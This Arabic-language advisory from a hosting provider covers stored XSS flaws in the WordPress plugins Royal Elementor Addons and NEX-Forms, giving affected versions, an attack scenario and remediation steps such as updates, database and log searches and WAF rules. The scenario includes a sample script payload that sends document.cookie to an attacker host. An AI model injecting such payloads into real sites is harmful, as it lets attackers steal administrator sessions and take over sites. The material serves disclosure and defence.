شعار منصة فورجوالي الرسمي - خدمات الرسائل والواتساب والاستضافة

ثغرة في إضافة Royal Elementor Addons لـ WordPress: حقن سكربتات مُخزّنة عبر طلبات AJAX غير مُوثَّقة

مقدمة: تهديد جديد يطال آلاف المواقع السعودية المبنية على WordPress

في الخامس من مايو 2026، تم الإفصاح عن ثغرة أمنية خطيرة تحمل المعرّف CVE-2026-4803 تؤثر على إضافة Royal Elementor Addons الشهيرة لنظام إدارة المحتوى WordPress، وذلك بدرجة خطورة عالية (CVSS 7.2). الثغرة تصنّف ضمن فئة CWE-79 (Cross-Site Scripting) وتحديداً النوع المُخزَّن (Stored XSS)، وهو الأخطر لأنه يبقى كامناً في قاعدة البيانات ويُنفَّذ تلقائياً على كل زائر أو مسؤول.

ما يزيد من خطورة هذه الثغرة هو إمكانية استغلالها من قِبَل مهاجمين غير مُوثَّقين (Unauthenticated)، أي دون الحاجة لامتلاك حساب على الموقع، نظراً لتسرّب قيمة الـ nonce علناً، وهو ما يفتح الباب لحملات استغلال آلية واسعة النطاق تستهدف المواقع السعودية والخليجية.

تفاصيل الثغرة التقنية

تكمن الثغرة في معالج AJAX الخاص بالإجراء wpr_update_form_action_meta داخل ملف wpr-actions-status.php، حيث يتم استقبال قيمة المعامل status من المستخدم دون تنقية كافية للمدخلات (Input Sanitization) ودون تطبيق آلية هروب سليمة للمخرجات (Output Escaping).

العامل الأكثر خطورة هو أن قيمة nonce التحقق (المفترض أن تحمي الإجراء) مُسرَّبة بشكل علني في كود الواجهة الأمامية، مما يعني أن أي متصفح أو سكربت آلي يستطيع الحصول عليها بسهولة واستدعاء الـ AJAX endpoint باسم زائر غير مسجل الدخول.

سيناريو الاستغلال النموذجي:

  1. المهاجم يجلب قيمة nonce من صفحة تحتوي على نموذج Royal Elementor.
  2. يُرسل طلب POST إلى admin-ajax.php مع الإجراء wpr_update_form_action_meta.
  3. يحقن في معامل status كود JavaScript خبيث مثل <script>fetch('https://attacker.sa/steal?c='+document.cookie)</script>.
  4. الكود يُخزَّن في قاعدة البيانات، ويُنفَّذ في كل مرة يفتح فيها المسؤول لوحة إدارة النماذج أو المُرسلات.
  5. النتيجة: سرقة ملفات تعريف الارتباط، اختطاف الجلسات، تصعيد الصلاحيات إلى Administrator، ثم السيطرة الكاملة على الموقع.

الأنظمة والإصدارات المتأثرة

  • الإضافة: Royal Elementor Addons (المعروفة أيضاً بـ WPR Addons).
  • الإصدارات المتأثرة: جميع الإصدارات حتى 1.7.1056 (شاملة).
  • الإصدار المُصحَّح: 1.7.1057 فما فوق (يُنصح بالترقية الفورية).
  • البيئة: مواقع WordPress التي تستخدم Elementor مع هذه الإضافة، بما في ذلك المتاجر الإلكترونية ومواقع الأخبار والشركات.

لماذا يجب على مسؤولي الاستضافة في السعودية الانتباه؟

مسؤول سعودي يفحص ثغرة wordpress عبر AJAX تنقل سكربتات خبيثة لقاعدة البيانات

بحسب إحصائيات استخدام WordPress في المملكة العربية السعودية ودول الخليج، تعتمد نسبة كبيرة من المواقع التجارية والإعلامية على Elementor وإضافاته المساعدة، ومنها Royal Elementor Addons التي تتجاوز 300 ألف تثبيت نشط عالمياً. في السياق المحلي:

  • المواقع الحكومية وشبه الحكومية التي تخضع لإشراف هيئة الاتصالات والفضاء والتقنية (CST) والتي تتبنى معايير الأمن السيبراني الصادرة عن الهيئة الوطنية للأمن السيبراني (NCA) معرّضة لانتهاك الامتثال عند إهمال هذه الترقية.
  • متاجر التجارة الإلكترونية التي تعالج مدفوعات عبر مدى أو Apple Pay معرّضة لسرقة بيانات العملاء، مما يُعد انتهاكاً صريحاً لـ نظام حماية البيانات الشخصية (PDPL).
  • مزودو الاستضافة المحليون ومراكز البيانات السعودية يواجهون مخاطر تلويث سمعة شبكاتهم وإدراج نطاقاتهم في قوائم الحظر العالمية حال استغلال مواقع عملائهم لنشر برمجيات خبيثة.

الخطوات العملية الموصى بها لمسؤولي النظم

1. الترقية الفورية (الإجراء الأول والأهم)

مسؤول WordPress خليجي يراقب ثغرة XSS عبر AJAX بين التطبيق وقاعدة البيانات

قم بتحديث إضافة Royal Elementor Addons إلى أحدث إصدار (1.7.1057 أو أعلى) من لوحة تحكم WordPress مباشرة:

wp plugin update royal-elementor-addons --allow-root

2. الفحص الاستباقي للاختراق

قبل وبعد الترقية، افحص قاعدة البيانات بحثاً عن أي محتوى مشبوه:

SELECT * FROM wp_postmeta WHERE meta_key LIKE '%wpr%' AND meta_value LIKE '%<script%';
SELECT * FROM wp_options WHERE option_value LIKE '%onerror=%' OR option_value LIKE '%javascript:%';

3. تفعيل جدار حماية تطبيقات الويب (WAF)

قم بتفعيل قواعد WAF لحظر محاولات حقن XSS في طلبات admin-ajax.php، سواء عبر Cloudflare أو عبر حلول محلية مثل Wordfence أو Sucuri. خدمات الاستضافة السعودية المتوافقة مع معايير CST غالباً تقدم WAF مُدمجاً.

4. تدوير مفاتيح WordPress السرية

إذا اشتبهت بأن موقعك تعرّض للاستغلال، قم بتحديث مفاتيح wp-config.php لإبطال كل الجلسات النشطة:

define('AUTH_KEY', '...مفتاح جديد...');
define('SECURE_AUTH_KEY', '...');
// ... إلخ

5. مراجعة حسابات المسؤولين

تحقق من عدم وجود حسابات Administrator مشبوهة أُضيفت مؤخراً، وأعد تعيين كلمات المرور لجميع الحسابات ذات الصلاحيات العالية، مع تفعيل المصادقة الثنائية (2FA).

6. مراجعة سجلات الوصول

ابحث في سجلات خادم الويب عن طلبات POST مشبوهة إلى admin-ajax.php تحمل المعامل action=wpr_update_form_action_meta:

grep 'wpr_update_form_action_meta' /var/log/nginx/access.log | grep POST

إجراءات الحماية طويلة المدى

  • سياسة CSP صارمة: فعّل Content-Security-Policy لمنع تنفيذ السكربتات المُضمَّنة من مصادر غير موثوقة.
  • مبدأ الحد الأدنى من الإضافات: احذف كل إضافة غير مستخدمة، فكل إضافة هي سطح هجوم محتمل.
  • النسخ الاحتياطي اليومي: اعتمد على نسخ احتياطية مُشفَّرة ومُخزَّنة في مراكز بيانات سعودية مطابقة لمتطلبات SDAIA.
  • المراقبة المستمرة: استخدم أدوات مراقبة تغيّر الملفات (File Integrity Monitoring) للكشف عن أي تعديل غير مُصرَّح به.

مخاطر عدم الاستجابة السريعة

رجل بزي خليجي يفحص ثغرة WordPress مع أيقونة برمجية وتنبيه قاعدة بيانات

تجاهل هذه الثغرة قد يؤدي إلى:

  • اختطاف كامل للموقع وتحويله إلى منصة توزيع برمجيات خبيثة.
  • إدراج النطاق في قوائم Google Safe Browsing السوداء، مما يعني خسارة كاملة لحركة الزيارات العضوية.
  • غرامات مالية بموجب نظام حماية البيانات الشخصية السعودي قد تصل إلى 5 ملايين ريال.
  • فقدان شهادات الامتثال مثل ISO 27001 وPCI DSS.
  • تضرر سمعة العلامة التجارية وفقدان ثقة العملاء.

دور 4Jawaly في دعم أمان عملائها

في فورجوالي (4Jawaly)، المرخصة من هيئة الاتصالات والفضاء والتقنية (ترخيص 291-10-32) والحاصلة على شهادة ISO 27001، نولي أمان منصات الاستضافة لدينا أولوية قصوى. نوفر لعملائنا في قطاعات التجارة الإلكترونية والإعلام بيئات WordPress مُحصَّنة مع تحديثات تلقائية، جدران حماية تطبيقات ويب، ومراقبة على مدار الساعة، إلى جانب حلول إشعارات SMS وواتساب للتنبيه الفوري عند اكتشاف أنشطة مشبوهة على حسابات الإدارة.

خاتمة

ثغرة CVE-2026-4803 ليست مجرد خلل تقني عابر، بل تذكير صارم بأن أمان WordPress يعتمد على أضعف إضافة مُثبَّتة. مع وجود nonce مُسرَّب علناً وإمكانية الاستغلال من مهاجمين غير مسجلين، فإن الفترة الزمنية بين الإفصاح وموجة الاستغلال الآلي ستكون قصيرة جداً. نُوصي كل مسؤول نظم في المملكة والخليج بإجراء الترقية خلال 24 ساعة وإجراء فحص شامل للاختراق.

الأسئلة الأكثر شيوعاً

ما مدى خطورة ثغرة CVE-2026-4803؟
الخطورة عالية بتقييم CVSS 7.2، وما يزيدها خطورة أنها تسمح للمهاجمين غير المسجلين باستغلالها بسبب تسرّب nonce التحقق علناً، مما يجعل الاستغلال الآلي الجماعي ممكناً.
كيف أعرف إذا كان موقعي مُصاباً؟
افحص جدول wp_postmeta في قاعدة البيانات بحثاً عن قيم تحتوي على وسوم ، وراجع سجلات admin-ajax.php للبحث عن طلبات POST تحمل action=wpr_update_form_action_meta، وتحقق من عدم وجود حسابات Administrator مشبوهة.
ما الإصدار الآمن من إضافة Royal Elementor Addons؟
الإصدار 1.7.1057 فما فوق هو الإصدار المُصحَّح. جميع الإصدارات حتى 1.7.1056 مشمولة (شاملة) متأثرة بالثغرة.
هل يكفي تحديث الإضافة فقط؟
التحديث خطوة أساسية لكن غير كافية إذا كان الموقع قد استُغل بالفعل. يجب إجراء فحص شامل لقاعدة البيانات، تدوير مفاتيح wp-config.php، إعادة تعيين كلمات المرور، ومراجعة حسابات المسؤولين.
ما علاقة هذه الثغرة بنظام حماية البيانات الشخصية السعودي (PDPL)؟
إذا أدى استغلال الثغرة إلى تسريب بيانات شخصية لعملاء سعوديين، فإن ذلك يُعد انتهاكاً صريحاً لـ PDPL وقد يعرّض المنشأة لغرامات تصل إلى 5 ملايين ريال، إضافة إلى الالتزام بإبلاغ SDAIA خلال 72 ساعة.

تحذير: ثغرة XSS مخزّنة في إضافة NEX-Forms تهدد آلاف مواقع ووردبريس

كُشف عن ثغرة Stored XSS حرجة في إضافة NEX-Forms – Ultimate Forms Plugin for WordPress تطال جميع الإصدارات حتى 9.1.11. تسمح الثغرة لمهاجمين غير مصادقين بحقن سكربتات ضارة تُنفَّذ عند زيارة الصفحات المصابة. يُنصح أصحاب المواقع والمستضيفون بالتحديث الفوري لحماية المستخدمين ولوحات الإدارة.

⚠️ عالية · CVSS 7.2CVE-2026-5063 · CWE-79

التفاصيل التقنية للثغرة

تتعلق الثغرة المُعرَّفة بـ CVE-2026-5063 بخلل في دالة submit_nex_form() داخل إضافة NEX-Forms – Ultimate Forms Plugin for WordPress، حيث لا تقوم الإضافة بتنقية (sanitization) أسماء مفاتيح معاملات الطلب من نوع POST، ولا بتهريب المخرجات (output escaping) بشكل كافٍ.

يقوم المهاجم بإرسال طلب POST يحتوي على أسماء مفاتيح مُعدَّة خصيصاً تضم كود JavaScript خبيث. يُخزَّن هذا الكود في قاعدة بيانات الموقع (ومن هنا تصنيف Stored XSS وفق CWE-79)، ثم يُنفَّذ في متصفح أي مستخدم أو مدير يفتح الصفحة المصابة لاحقاً.

  • نوع الثغرة: Stored Cross-Site Scripting
  • المتطلب: لا يحتاج المهاجم إلى أي مصادقة (Unauthenticated)
  • الإصدارات المتأثرة: جميع الإصدارات حتى 9.1.11 شاملةً
  • نقطة الحقن: أسماء معاملات POST في دالة submit_nex_form()
CVE-2026-5063 - WordPress - أمان السيرفرات
CVE-2026-5063 · WordPress · HIGH

درجة الخطورة

حصلت الثغرة على تقييم CVSS 7.2 (HIGH)، وهو تقييم مرتفع نظراً لعدة عوامل:

  • إمكانية الاستغلال دون الحاجة لأي حساب أو صلاحيات مسبقة.
  • قابلية الاستغلال عن بُعد عبر طلبات HTTP اعتيادية.
  • خطر اختطاف جلسات المسؤولين (Admin Session Hijacking) مما قد يؤدي إلى سيطرة كاملة على الموقع.
  • احتمال إعادة توجيه الزوار إلى مواقع خبيثة أو زرع backdoors عبر لوحة الإدارة.

بالنسبة لشركات الاستضافة المشتركة، قد تتحول ثغرة واحدة إلى وسيلة لاختراق عدد كبير من المواقع في الخادم نفسه إذا نجح المهاجم في الوصول إلى حساب إداري.

هل تم استغلالها؟

حتى لحظة النشر، لم تُدرج الثغرة ضمن قائمة CISA KEV للثغرات المُستغلَّة فعلياً، ولا توجد تقارير علنية تؤكد استغلالاً واسعاً في البرية. غير أن طبيعة الثغرة (XSS مخزّنة بدون مصادقة) تجعلها هدفاً جذاباً جداً للأدوات الآلية ومحركات المسح الخاصة بالمهاجمين، ومن المتوقع ظهور محاولات استغلال جماعي خلال فترة قصيرة بعد نشر التفاصيل.

الحل والإصلاح

الإجراء الأساسي هو تحديث الإضافة فوراً إلى إصدار أحدث من 9.1.11 يتضمن التصحيح الصادر في changeset 3513524.

للتحقق من وجود الإضافة والإصدار الحالي عبر WP-CLI:

wp plugin list --name=nex-forms-express-wp-form-builder

لتحديث الإضافة مباشرة عبر WP-CLI:

wp plugin update nex-forms-express-wp-form-builder

إذا تعذّر التحديث الفوري، يمكن تعطيل الإضافة كإجراء مؤقت:

wp plugin deactivate nex-forms-express-wp-form-builder

للبحث عن جميع المواقع المصابة على خادم استضافة يحوي عدة مواقع ووردبريس:

find /var/www -type d -name "nex-forms-express-wp-form-builder"

للتحقق من سجلات الوصول بحثاً عن محاولات استغلال مشبوهة على مسارات الإرسال:

grep -i "admin-ajax.php" /var/log/nginx/access.log | grep -i "nex_form"

يُوصى إضافةً إلى ذلك بتفعيل Web Application Firewall (WAF) مثل Wordfence أو قواعد ModSecurity على مستوى الخادم لرصد محاولات حقن وسوم <script> داخل أسماء المعاملات.

الخلاصة والتوصية

تمثّل ثغرة CVE-2026-5063 تهديداً حقيقياً لكل موقع ووردبريس يستخدم إضافة NEX-Forms بإصدار 9.1.11 أو أقدم، خصوصاً أنها قابلة للاستغلال دون مصادقة. ننصح مسؤولي السيرفرات ومزودي الاستضافة بما يلي:

  1. التحديث الفوري إلى الإصدار المُصحَّح، أو تعطيل الإضافة حتى يتوفر التحديث.
  2. إجراء مسح شامل لقاعدة بيانات الموقع بحثاً عن مدخلات تحتوي على كود JavaScript مشبوه.
  3. تدوير كلمات مرور حسابات الإدارة ومفاتيح wp-config.php كإجراء احترازي.
  4. تفعيل التحديثات التلقائية للإضافات الحرجة عبر WordPress أو على مستوى لوحة التحكم في الاستضافة.

📎 ملفات التحميل

📄 English Security Advisory – تقرير احترافي للمختصين

📝 Technical README (Markdown) – وثائق تقنية للفرق الداخلية

تحذير لمستخدمي NEX-Forms: ثغرة XSS مخزّنة تهدد موقعك بالكامل

اكتُشفت ثغرة Stored Cross-Site Scripting خطيرة في إضافة NEX-Forms – Ultimate Forms Plugin الشهيرة لووردبريس، تؤثر على جميع الإصدارات حتى 9.1.11. تسمح الثغرة لمهاجمين غير مصادقين بحقن سكربتات ضارة تُنفَّذ عند زيارة الصفحات المصابة. ننصح جميع مدراء المواقع بالتحديث الفوري لحماية زوارهم ولوحات التحكم من سرقة الجلسات والتلاعب بالمحتوى.

⚠️ عالية · CVSS 7.2CVE-2026-5063 · CWE-79

التفاصيل التقنية للثغرة

الثغرة المُسجّلة برقم CVE-2026-5063 تقع في دالة submit_nex_form() داخل إضافة NEX-Forms، وتُصنَّف ضمن نوع CWE-79 (Cross-Site Scripting). يعود السبب الجذري إلى قصور في تعقيم المدخلات (input sanitization) وغياب الهروب الصحيح للمخرجات (output escaping) عند معالجة أسماء مفاتيح معاملات طلبات POST المُرسلة إلى الخادم.

عند إرسال نموذج عبر الإضافة، يتم تخزين أسماء مفاتيح POST دون تصفية كافية، مما يمكّن المهاجم من إدراج شيفرة JavaScript ضارة تُحفظ في قاعدة البيانات وتُنفَّذ لاحقاً عند عرض الصفحة لأي مستخدم، بما في ذلك المسؤولين. ولأن الاستغلال لا يتطلب مصادقة (unauthenticated)، فإن سطح الهجوم واسع ويشمل أي زائر عابر للموقع.

الإصدارات المتأثرة: جميع إصدارات NEX-Forms حتى 9.1.11 (شاملة).

CVE-2026-5063 - WordPress - أمان السيرفرات
CVE-2026-5063 · WordPress · HIGH

درجة الخطورة

حصلت الثغرة على تقييم CVSS 7.2 ضمن الفئة العالية (HIGH). ورغم أنها لم تُدرج في قائمة KEV الخاصة بـ CISA حتى لحظة النشر، إلا أن طبيعتها المخزّنة وكونها قابلة للاستغلال دون مصادقة يجعلانها تهديداً بالغ الخطورة لبيئات استضافة المواقع. تشمل العواقب المحتملة:

سرقة ملفات تعريف الارتباط للمسؤولين، واختطاف جلسات الإدارة، وإعادة توجيه الزوار إلى مواقع تصيّد أو توزيع برمجيات خبيثة، وحقن مواد SEO Spam، وتشويه صفحات الموقع. وفي بيئات الاستضافة المشتركة، قد يستخدم المهاجم الموقع المصاب كنقطة انطلاق لاستهداف مواقع أخرى على نفس الخادم.

هل تم استغلالها؟

وفقاً للمعلومات المتاحة من Wordfence ومستودع ووردبريس الرسمي، لا يوجد حتى الآن تأكيد علني لاستغلال نشط واسع النطاق لهذه الثغرة في البرية (in the wild)، ولم تُدرج في كتالوج KEV. غير أن نشر التفاصيل وتوفّر التصحيح في changeset علني يرفعان احتمال محاولات الاستغلال خلال الأيام المقبلة، خاصة مع شيوع الإضافة وسهولة أتمتة هجمات XSS المخزّنة.

الحل والإصلاح

الحل الرسمي هو التحديث فوراً إلى أحدث إصدار من الإضافة الذي يعالج المشكلة (ما بعد 9.1.11)، كما هو موضّح في الـ changeset رقم 3513524 على plugins.trac.wordpress.org.

للتحقق من الإصدار المثبّت حالياً عبر WP-CLI:

wp plugin get nex-forms-express-wp-form-builder --field=version

لتحديث الإضافة مباشرة:

wp plugin update nex-forms-express-wp-form-builder

للبحث عن أي محتوى مشبوه محقون في قاعدة البيانات:

wp db query "SELECT * FROM wp_posts WHERE post_content LIKE '%<script%' OR post_content LIKE '%onerror=%';"

إذا لم يكن بإمكانك التحديث فوراً، يُنصح بتعطيل الإضافة مؤقتاً:

wp plugin deactivate nex-forms-express-wp-form-builder

إجراءات إضافية موصى بها على مستوى السيرفر: تفعيل قواعد ModSecurity أو WAF (مثل Wordfence) لحجب أنماط XSS الشائعة، ومراجعة سجلات access.log بحثاً عن طلبات POST غير اعتيادية تستهدف endpoint الإضافة، وتدوير كلمات مرور الحسابات الإدارية بعد التحديث.

الخلاصة والتوصية

ثغرة CVE-2026-5063 تُذكّرنا بأن إضافات النماذج تمثّل واجهة استقبال مباشرة للمدخلات الخارجية، وأي خلل في تعقيمها ينعكس فوراً على أمان الموقع بأكمله. نوصي مدراء السيرفرات وشركات الاستضافة بإبلاغ عملائهم الذين يستخدمون NEX-Forms، ودفع التحديث الآلي عبر أدوات الإدارة المركزية، وتعزيز طبقات الدفاع عبر WAF ومراقبة السجلات. التحديث السريع هو خط الدفاع الأول والأهم.

📎 ملفات التحميل

📄 English Security Advisory – تقرير احترافي للمختصين

📝 Technical README (Markdown) – وثائق تقنية للفرق الداخلية